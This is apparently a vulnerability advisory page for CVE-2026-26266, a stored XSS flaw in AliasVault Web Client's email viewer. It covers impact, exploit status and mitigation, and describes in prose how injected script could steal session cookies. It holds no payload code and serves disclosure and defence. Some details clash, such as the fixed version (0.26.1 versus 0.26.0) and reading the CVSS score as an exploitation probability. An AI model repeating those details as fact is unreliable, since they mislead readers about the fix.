Platform
javascript
Component
aliasvault
Fixed in
0.26.1
A stored cross-site scripting (XSS) vulnerability exists in AliasVault Web Client versions 0.25.3 and earlier. This vulnerability resides within the email rendering feature, specifically when viewing emails received on an alias. An attacker can leverage this to inject malicious JavaScript into emails, which will then execute within the user's browser when they view the email, potentially compromising their account and data. The vulnerability is fixed in version 0.26.0.
The impact of this XSS vulnerability is significant. An attacker can craft a malicious email containing JavaScript code and send it to any AliasVault email alias. When a victim views this email in the AliasVault Web Client, the JavaScript executes in the same origin as the application. This allows the attacker to potentially steal session cookies, redirect the user to a phishing site, modify the content of the page, or perform other actions as if they were the legitimate user. The lack of origin isolation within the iframe rendering process exacerbates the risk, allowing for complete control over the user's session. This vulnerability could lead to widespread account compromise and data breaches.
This vulnerability was publicly disclosed on 2026-03-03. No public proof-of-concept (PoC) code has been released at the time of writing, but the vulnerability's nature makes it likely that PoCs will emerge. The CVSS score of 9.3 (CRITICAL) indicates a high probability of exploitation. It is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.04% (12% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-26266 is to immediately upgrade AliasVault Web Client to version 0.26.0 or later. Until the upgrade is possible, consider implementing strict email filtering rules to block emails from untrusted senders or containing suspicious HTML content. While not a complete solution, a Web Application Firewall (WAF) configured to detect and block XSS payloads targeting the email rendering feature can provide an additional layer of defense. Regularly review AliasVault's security advisories for further guidance and updates.
Actualice AliasVault Web Client a la versión 0.26.0 o superior. Esta versión corrige la vulnerabilidad XSS al aplicar sanitización y sandboxing al contenido HTML de los correos electrónicos antes de renderizarlos. La actualización previene la ejecución de scripts maliciosos al visualizar correos en el cliente web.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-26266 is a critical stored XSS vulnerability in AliasVault Web Client versions 0.25.3 and earlier. It allows attackers to inject malicious JavaScript into emails, potentially compromising user accounts.
If you are using AliasVault Web Client versions 0.25.3 or earlier, you are affected by this vulnerability. Upgrade to version 0.26.0 or later to mitigate the risk.
The fix is to upgrade AliasVault Web Client to version 0.26.0 or later. This resolves the vulnerability by properly sanitizing HTML content during email rendering.
While no active exploitation has been confirmed, the vulnerability's severity and ease of exploitation suggest it is likely to be targeted. Monitor your systems and implement mitigations proactively.
Refer to the official AliasVault security advisory for detailed information and updates regarding CVE-2026-26266: [https://aliasvault.com/security/advisories](https://aliasvault.com/security/advisories)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.